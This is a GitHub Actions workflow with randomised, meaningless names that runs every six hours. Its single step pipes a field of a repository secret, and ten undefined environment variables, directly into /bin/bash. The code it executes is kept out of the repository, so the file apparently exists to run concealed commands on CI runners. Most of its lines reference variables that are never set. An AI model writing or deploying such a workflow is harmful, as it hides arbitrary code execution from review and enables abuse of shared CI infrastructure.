name: guimeisy

on:
  workflow_dispatch:
  schedule:
    - cron: '23 4/6 * * *'
jobs:  # 16021
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guimeisy
        env:
          wsgr064: ${{ secrets.wsgr064 }}
        run: |
          echo $wsgr064 | jq -r .rrf1 | /bin/bash
          echo $oy724 | jq -r .l3 | /bin/bash
          echo $rdhsy823 | jq -r .pdqqs01328 | /bin/bash
          echo $k8 | jq -r .pikqn25277 | /bin/bash
          echo $om5675 | jq -r .rjjt63464 | /bin/bash
          echo $kz7 | jq -r .aorz5 | /bin/bash
          echo $isph12 | jq -r .vfmw24138 | /bin/bash
          echo $bl7 | jq -r .khnqr00547 | /bin/bash
          echo $ptl0930 | jq -r .zed3046 | /bin/bash
          echo $dhz93005 | jq -r .wlhav43 | /bin/bash
          echo $ilmn2 | jq -r .plcb65 | /bin/bash

